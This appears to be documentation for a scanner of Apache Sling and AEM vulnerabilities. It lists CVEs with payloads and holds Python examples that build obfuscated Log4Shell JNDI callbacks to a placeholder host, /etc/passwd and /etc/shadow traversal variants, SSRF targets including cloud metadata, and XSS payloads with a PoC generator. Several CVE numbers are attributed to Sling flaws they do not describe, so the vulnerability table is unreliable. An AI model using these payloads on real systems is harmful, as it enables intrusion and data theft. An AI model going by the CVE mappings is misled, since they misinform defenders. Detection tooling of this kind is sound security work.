CVE Detection
Apache Sling Auditor includes automated detection for multiple known CVEs affecting Apache Sling and AEM.
Supported CVEs
Critical Severity
CVE-2021-44228 (Log4Shell)
Type: Remote Code Execution (RCE)
Severity: Critical
Affected Versions: Log4j < 2.15.0
Description:
Remote code execution vulnerability in Apache Log4j2 via JNDI lookup. This is one of the most critical vulnerabilities affecting Java applications.
Detection Method:
- Out-of-Band (OOB) testing via DNS/LDAP/RMI
- Multiple injection points (headers, parameters)
- Response time analysis
- Pattern detection
Injection Points:
- 15+ HTTP headers (X-Forwarded-For, User-Agent, etc.)
- 10+ URL parameters
- Multiple payload variants
Payloads:
- `${jndi:ldap://oob-domain.com/a}`
- `${jndi:dns://oob-domain.com}`
- Obfuscated variants
Test Paths:
- `/system/console`
- `/bin/querybuilder.json`
- `/system/console/status-slingsettings.json`
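The OOB test above only tells you that the host is vulnerable unless every injection point carries its own callback hostname; otherwise a single DNS hit cannot be traced back to the header or parameter that triggered it. The block below is an added example, not Apache Sling Auditor's own code: it builds the probe set with the injection point encoded in a DNS label, includes the nested-lookup obfuscations, and maps a listener hit back to its origin. `oob-domain.com` is a placeholder, and the header, parameter and path lists are assumptions trimmed for illustration.

```python
"""Log4Shell OOB probe builder with per-injection-point callback hostnames.

Added example, not part of Apache Sling Auditor. OOB_DOMAIN is a placeholder
and the header/parameter lists are assumptions chosen for illustration.
"""
import secrets
from typing import Dict, List, Optional

OOB_DOMAIN = "oob-domain.com"  # placeholder: use a DNS listener you control

HEADERS = ["User-Agent", "X-Forwarded-For", "Referer", "X-Api-Version"]
PARAMS = ["q", "path", "property", "value"]
PATHS = ["/system/console", "/bin/querybuilder.json",
         "/system/console/status-slingsettings.json"]


def jndi_variants(host: str) -> List[str]:
    """Plain and obfuscated JNDI lookups that all resolve the same callback host.

    The nested-lookup forms defeat filters that only look for the literal
    text '${jndi:'; Log4j evaluates the inner lookups first.
    """
    return [
        f"${{jndi:ldap://{host}/a}}",
        f"${{jndi:dns://{host}}}",
        f"${{${{lower:j}}ndi:ldap://{host}/a}}",
        f"${{${{::-j}}${{::-n}}${{::-d}}${{::-i}}:ldap://{host}/a}}",
    ]


def callback_host(run_id: str, point: str) -> str:
    """Encode the injection point in the hostname so a DNS hit identifies it.

    DNS labels are case-insensitive and limited to alphanumerics and hyphens,
    so the point name is lower-cased and any other character becomes '-'.
    """
    label = "".join(c if c.isalnum() or c == "-" else "-" for c in point.lower())
    return f"{run_id}.{label}.{OOB_DOMAIN}"


def build_probes(base_url: str, run_id: Optional[str] = None) -> List[Dict]:
    """One request per (path, injection point, payload variant)."""
    run_id = run_id or secrets.token_hex(4)
    probes = []
    for path in PATHS:
        for header in HEADERS:
            host = callback_host(run_id, "h-" + header)
            for payload in jndi_variants(host):
                probes.append({"url": base_url + path, "headers": {header: payload},
                               "params": {}, "host": host, "point": "header:" + header})
        for param in PARAMS:
            host = callback_host(run_id, "p-" + param)
            for payload in jndi_variants(host):
                probes.append({"url": base_url + path, "headers": {},
                               "params": {param: payload}, "host": host, "point": "param:" + param})
    return probes


def match_callback(seen_hostname: str, probes: List[Dict]) -> Optional[str]:
    """Map a hostname seen on the DNS listener back to the injection point.

    Suffix matching tolerates labels a resolver may prepend; a query for an
    unrelated name under OOB_DOMAIN (e.g. a scanner's own lookups) returns None.
    """
    seen = seen_hostname.lower().rstrip(".")
    for probe in probes:
        if seen == probe["host"] or seen.endswith("." + probe["host"]):
            return probe["point"]
    return None


if __name__ == "__main__":
    probes = build_probes("https://aem.example.test", run_id="a1b2c3d4")
    print(len(probes), "probes; first:", probes[0])
    print(match_callback("a1b2c3d4.h-user-agent.oob-domain.com", probes))
```

Send each probe with the HTTP client of your choice and keep the returned list; when the listener logs a query, pass the queried name to `match_callback` to learn which header or parameter was evaluated by Log4j. Because the run id is fresh per scan, hits from an earlier run cannot be confused with the current one.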
Remediation:
Update to Log4j 2.15.0 or higher, or mitigate by setting `log4j2.formatMsgNoLookups=true`. Note that 2.15.0 and the `formatMsgNoLookups` mitigation were later found insufficient in some non-default configurations (CVE-2021-45046); upgrade to the current Log4j 2.x release, or remove the `JndiLookup` class from the jar where upgrading is not possible.
CVE-2017-12617 (Path Traversal)
Type: Path Traversal
Severity: Critical
Affected Versions: Apache Sling < 9.0
Description:
Path traversal vulnerability allowing unauthorized file system access.
Detection Method:
- File system access testing
- Multiple encoding variants
- Response analysis for file content
Payloads:
- `../../../etc/passwd`
- `..%2F..%2F..%2Fetc%2Fpasswd`
- Double encoding variants
Exploitation:
Attempts to read sensitive files:
- `/etc/passwd`
- `/etc/shadow`
- Application configuration files
Remediation:
Update to Apache Sling 9.0 or higher.
High Severity
CVE-2020-11987 (SSRF)
Type: Server-Side Request Forgery
Severity: High
Affected Versions: Apache Sling < 11.4
Description:
Server-Side Request Forgery vulnerability in Sling servlets allowing access to internal resources.
Detection Method:
- Internal resource access testing
- Response analysis for internal content
- Multiple payload variants
Payloads:
- `http://127.0.0.1:4502`
- `http://localhost/system/console`
- `file:///etc/passwd`
- AWS metadata endpoints
Exploitation:
Tests access to:
- Localhost services
- File system
- AWS metadata endpoints
- Internal network resources
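The traversal probes (CVE-2017-12617 above) and the SSRF probes (CVE-2020-11987) are judged the same way: not by whether the request was accepted, but by whether the response contains content that could only have come from the target file or internal service. A 404 page that echoes `../../../etc/passwd` back is not a hit. The block below is an added example, not Apache Sling Auditor's code: it generates the encoding variants and classifies responses against constructed samples. The console title strings are assumed markers.

```python
"""Encoding variants and response checks for the traversal and SSRF probes.

Added example, not Apache Sling Auditor's code. The console title strings are
assumed markers and every sample response below is constructed.
"""
import re
from typing import List, Optional
from urllib.parse import quote

# What a successful read or fetch looks like. Matching file or service content
# rather than the probe string echoed back is what keeps error pages from
# counting as hits.
INDICATORS = {
    "unix-passwd": re.compile(r"^root:[^:\n]*:0:0:", re.M),
    # shadow's third field is days since the epoch (five digits today) where
    # passwd has the one-digit uid 0, so this pattern does not match /etc/passwd
    "unix-shadow": re.compile(r"^root:[^:\n]*:\d{4,}:", re.M),
    "aws-imds": re.compile(r"^(ami-id|instance-id|iam/)\s*$", re.M),
    "felix-console": re.compile(  # assumed page titles
        r"Apache Felix Web Console|Adobe Experience Manager Web Console"),
}

SSRF_TARGETS = [
    "http://127.0.0.1:4502",
    "http://localhost/system/console",
    "file:///etc/passwd",
    "http://169.254.169.254/latest/meta-data/",  # AWS IMDSv1 listing
]


def traversal_variants(target: str, depth: int = 3) -> List[str]:
    """The same relative path in several encodings.

    The container, the Sling resource resolver and any WAF in front may each
    decode once, twice or not at all, so one form is not a fair test.
    """
    rel = target.lstrip("/")
    plain = "../" * depth + rel
    once = quote(plain, safe="")               # ..%2F..%2F..%2Fetc%2Fpasswd
    variants = [
        plain,
        once,
        quote(once, safe=""),                  # ..%252F (double encoding)
        plain.replace("../", "..\\"),          # backslash separators
        plain.replace("../", "....//"),        # survives one '../' strip pass
        plain.replace("/", "%c0%af"),          # overlong UTF-8 slash, legacy decoders
    ]
    return list(dict.fromkeys(variants))       # dedupe, keep order


def classify(body: str) -> Optional[str]:
    """Name the indicator whose content is present in the body, else None."""
    for name, pattern in INDICATORS.items():
        if pattern.search(body):
            return name
    return None


# Constructed sample responses (not captured from a real system)
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
SAMPLE_SHADOW = "root:$6$salt$hash:19345:0:99999:7:::\n"
SAMPLE_IMDS = "ami-id\nami-launch-index\nhostname\ninstance-id\niam/\n"
SAMPLE_ECHO = "<html><body>404 Resource not found: ../../../etc/passwd</body></html>"

if __name__ == "__main__":
    for v in traversal_variants("/etc/passwd"):
        print(v)
    for name, body in [("passwd", SAMPLE_PASSWD), ("shadow", SAMPLE_SHADOW),
                       ("imds", SAMPLE_IMDS), ("echo", SAMPLE_ECHO)]:
        print(name, "->", classify(body))
```

Run each variant (and each SSRF target) through the endpoint under test and feed the response body to `classify`; only a named indicator is a finding. The `SAMPLE_ECHO` case is the one that generates most false positives in naive scanners, because the probe string appears in the body even though nothing was read.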
Remediation:
Update to Apache Sling 11.4 or higher.
CVE-2017-12618 (SSRF)
Type: Server-Side Request Forgery
Severity: High
Affected Versions: Apache Sling < 9.0
Description:
SSRF vulnerability in Sling servlets.
Remediation:
Update to Apache Sling 9.0 or higher.
Medium Severity
CVE-2018-12809 (XSS)
Type: Cross-Site Scripting
Severity: Medium
Affected Versions: Apache Sling < 10.0
Description:
Cross-site scripting vulnerability in Query Builder API.
Detection Method:
- Payload injection into parameters
- Response analysis for reflection
- Multiple payload variants
Payloads:
- `<img src=x onerror=alert(1)>`
- `javascript:alert(document.domain)`
- `<script>alert(1)</script>`
Test Parameters:
- `property`
- `value`
- `q`
Exploitation:
Generates HTML PoC files demonstrating XSS.
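Reflection alone is not XSS: `/bin/querybuilder.json` answers with `application/json`, so a payload echoed verbatim in that body is not rendered by a browser, and an HTML-encoded echo shows output encoding is working. The block below is an added example, not Apache Sling Auditor's code; it classifies a reflection using the content type and `X-Content-Type-Options` header and writes the kind of PoC page the section mentions. The sample responses are constructed, not captured from a real instance.

```python
"""Reflection check for the XSS probes against Query Builder parameters.

Added example, not Apache Sling Auditor's code. Sample responses are
constructed; they are not captured from a real Sling or AEM instance.
"""
import html
from typing import Dict
from urllib.parse import urlencode

PAYLOADS = [
    "<img src=x onerror=alert(1)>",
    "javascript:alert(document.domain)",
    "<script>alert(1)</script>",
]
PARAMS = ["property", "value", "q"]


def classify_reflection(payload: str, headers: Dict[str, str], body: str) -> str:
    """Decide what a reflection means before calling it XSS.

    A payload echoed verbatim inside application/json with
    X-Content-Type-Options: nosniff is not renderable as HTML, and an
    HTML-encoded echo means the output encoding is working. Only a raw
    echo in text/html is a candidate worth a PoC.
    """
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    nosniff = h.get("x-content-type-options", "").strip().lower() == "nosniff"
    if payload in body:
        if ctype == "text/html":
            return "reflected-html"        # confirm with the PoC in a browser
        if nosniff:
            return "reflected-non-html"    # not a finding on its own
        return "reflected-sniffable"       # low confidence, legacy sniffing only
    if html.escape(payload, quote=True) in body or html.escape(payload, quote=False) in body:
        return "reflected-encoded"
    return "not-reflected"


def poc_html(url: str, param: str, payload: str) -> str:
    """Minimal PoC page: a link that submits the payload in the given parameter.

    The payload is URL-encoded inside the link, so the PoC file itself does
    not execute anything when opened; the target page does.
    """
    target = f"{url}?{urlencode({param: payload})}"
    return (
        "<!doctype html><html><body>"
        f'<a href="{html.escape(target, quote=True)}">Trigger via {html.escape(param)}</a>'
        "</body></html>"
    )


# Constructed sample responses: (headers, body)
SAMPLE_QUERYBUILDER_JSON = (
    {"Content-Type": "application/json;charset=utf-8",
     "X-Content-Type-Options": "nosniff"},
    '{"success":true,"results":0,"hits":[],"query":"<img src=x onerror=alert(1)>"}',
)
SAMPLE_HTML_ERROR = (
    {"Content-Type": "text/html;charset=UTF-8"},
    "<html><body><h1>Error</h1><p>Cannot resolve <img src=x onerror=alert(1)></p></body></html>",
)
SAMPLE_HTML_ENCODED = (
    {"Content-Type": "text/html"},
    "<p>No results for &lt;img src=x onerror=alert(1)&gt;</p>",
)

if __name__ == "__main__":
    p = PAYLOADS[0]
    for name, sample in [("json", SAMPLE_QUERYBUILDER_JSON), ("error", SAMPLE_HTML_ERROR),
                         ("encoded", SAMPLE_HTML_ENCODED)]:
        print(name, "->", classify_reflection(p, *sample))
    print(poc_html("https://aem.example.test/bin/querybuilder.json", "property", p))
```

Only `reflected-html` should be reported as a finding; write the PoC file for it and open it in a browser to confirm the handler fires. `reflected-non-html` on the Query Builder endpoint is the usual false positive.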
Remediation:
Update to Apache Sling 10.0 or higher.
CVE-2019-8086 (Information Disclosure)
Type: Information Disclosure
Severity: Medium
Affected Versions: Apache Sling < 11.0
Description:
Information disclosure through error messages and system endpoints.
Detection Method:
- Pattern matching in responses
- System property extraction
- Error message analysis
Check Patterns:
- `java.version`
- `os.name`
- `user.home`
- `java.home`
Test Paths:
- `/system/console/status-slingsettings.json`
- `/system/console/status-systemproperties.json`
- `/system/console/bundles.json`
Exploitation:
Extracts:
- Java version information
- Operating system details
- System properties
- User information
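The pattern matching above is only a finding when the status endpoint answers without credentials; `/system/console` is supposed to sit behind authentication, and a login page that happens to mention `java` is noise. The block below is an added example, not Apache Sling Auditor's code: it pulls the watched properties out of a response in either `key = value` or JSON form and reports a finding only for an unauthenticated 200 that actually leaked something. The sample bodies are constructed and do not assume the endpoints' exact output format.

```python
"""Extract leaked system properties from a Sling/Felix status endpoint response.

Added example, not Apache Sling Auditor's code. The sample bodies are
constructed to show the two response shapes the regex handles; the real
endpoints' exact formatting is not assumed here.
"""
import re
from typing import Dict, Optional

WATCHED = ("java.version", "java.home", "os.name", "os.version",
           "user.home", "user.name")

# Accepts  'java.version = 11.0.2'  as well as  '"java.version":"11.0.2"'.
_KV = re.compile(r'"?(?P<key>[a-z][a-z0-9_.]*)"?\s*[:=]\s*"?(?P<val>[^"\r\n,}]+)')


def extract_properties(body: str) -> Dict[str, str]:
    """Return the watched properties found in the body; first occurrence wins."""
    found: Dict[str, str] = {}
    for m in _KV.finditer(body):
        key = m.group("key")
        if key in WATCHED and key not in found:
            found[key] = m.group("val").strip()
    return found


def assess(status: int, body: str, authenticated: bool) -> Optional[Dict[str, str]]:
    """A finding only when the endpoint answered 200 without credentials and
    actually leaked something; a login redirect or an empty page is not one.

    java.version tells an attacker which JDK bugs apply, java.home and
    user.home reveal the install layout, and user.name names the service
    account, which is why these keys are watched.
    """
    if status != 200 or authenticated:
        return None
    props = extract_properties(body)
    return props or None


# Constructed sample responses (not captured from a real system)
SAMPLE_TEXT = (
    "java.home = /usr/lib/jvm/java-11-openjdk\n"
    "java.version = 11.0.2\n"
    "os.name = Linux\n"
    "user.home = /opt/aem\n"
    "user.name = aem\n"
)
SAMPLE_JSON = '{"java.version":"1.8.0_292","os.name":"Windows Server 2019","user.home":"/home/aem"}'
SAMPLE_LOGIN = "<html><head><title>Login</title></head><body>Please log in</body></html>"

if __name__ == "__main__":
    print(assess(200, SAMPLE_TEXT, authenticated=False))
    print(assess(200, SAMPLE_JSON, authenticated=False))
    print(assess(302, SAMPLE_LOGIN, authenticated=False))
```

Record whether the request that produced the body carried a session or basic-auth credential; the same body obtained with admin credentials is expected behaviour, not a disclosure.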
Remediation:
Update to Apache Sling 11.0 or higher.
CVE-2020-11984 (Path Traversal)
Type: Path Traversal
Severity: Medium
Affected Versions: Apache Sling < 11.4
Description:
Path traversal vulnerability in specific endpoints.
Remediation:
Update to Apache Sling 11.4 or higher.
CVE-2020-11985 (Path Traversal)
Type: Path Traversal
Severity: Medium
Affected Versions: Apache Sling < 11.4
Description:
Path traversal vulnerability in specific endpoints.
Remediation:
Update to Apache Sling 11.4 or higher.
CVE-2020-11986 (XSS)
Type: Cross-Site Scripting
Severity: Medium
Affected Versions: Apache Sling < 11.4
Description:
XSS vulnerability in specific components.
Remediation:
Update to Apache Sling 11.4 or higher.
Additional CVEs
CVE-2016-0957 (XSS)
Type: Cross-Site Scripting
Severity: Medium
Affected Versions: Apache Sling < 8.0
Remediation:
Update to Apache Sling 8.0 or higher.
CVE-2018-8013 (Information Disclosure)
Type: Information Disclosure
Severity: Medium
Affected Versions: Apache Sling < 9.0
Remediation:
Update to Apache Sling 9.0 or higher.
Detection Methods
1. Generic Detection
For generic CVEs, the auditor:
- Tests specified paths
- Injects payloads into parameters/headers
- Analyzes responses for indicators
- Checks for error messages
2. XSS Detection
Specialized XSS detection:
- Injects XSS payloads
- Checks for reflection in responses
- Analyzes response headers
- Generates PoC files
3. SSRF Detection
Specialized SSRF detection:
- Tests internal resource access
- Analyzes responses for internal content
- Checks for file system access
- Tests AWS metadata endpoints
4. Path Traversal Detection
Specialized path traversal detection:
- Tests file system access
- Uses multiple encoding variants
- Checks for sensitive file content
- Attempts file reading
5. Information Disclosure Detection
Specialized information disclosure detection:
- Pattern matching in responses
- Extracts system information
- Analyzes error messages
- Identifies sensitive data exposure
Detection Accuracy
The auditor uses multiple techniques to reduce false positives:
- Response Analysis: Detailed analysis of HTTP responses
- Pattern Matching: Specific patterns for vulnerability indicators
- Time Analysis: Response time analysis for OOB tests
- Multiple Payloads: Testing with various payload variants
- Encoding Variants: Testing with different encodings
False Positives
To reduce false positives:
- Use Stealth Mode: More accurate but slower
- Review Configuration: Adjust detection patterns
- Manual Verification: Verify findings manually
- Exploitation Mode: Use `--exploit` to validate findings
Adding Custom CVEs
See the Configuration Guide for instructions on adding custom CVEs.
CVE Summary Table
| CVE | Type | Severity | Affected Versions |
|---|---|---|---|
| CVE-2021-44228 | RCE | Critical | Log4j < 2.15.0 |
| CVE-2017-12617 | Path Traversal | Critical | Sling < 9.0 |
| CVE-2020-11987 | SSRF | High | Sling < 11.4 |
| CVE-2017-12618 | SSRF | High | Sling < 9.0 |
| CVE-2018-12809 | XSS | Medium | Sling < 10.0 |
| CVE-2019-8086 | Info Disclosure | Medium | Sling < 11.0 |
| CVE-2020-11984 | Path Traversal | Medium | Sling < 11.4 |
| CVE-2020-11985 | Path Traversal | Medium | Sling < 11.4 |
| CVE-2020-11986 | XSS | Medium | Sling < 11.4 |
| CVE-2016-0957 | XSS | Medium | Sling < 8.0 |
| CVE-2018-8013 | Info Disclosure | Medium | Sling < 9.0 |
Want to exploit these? Check out the Exploitation Guide!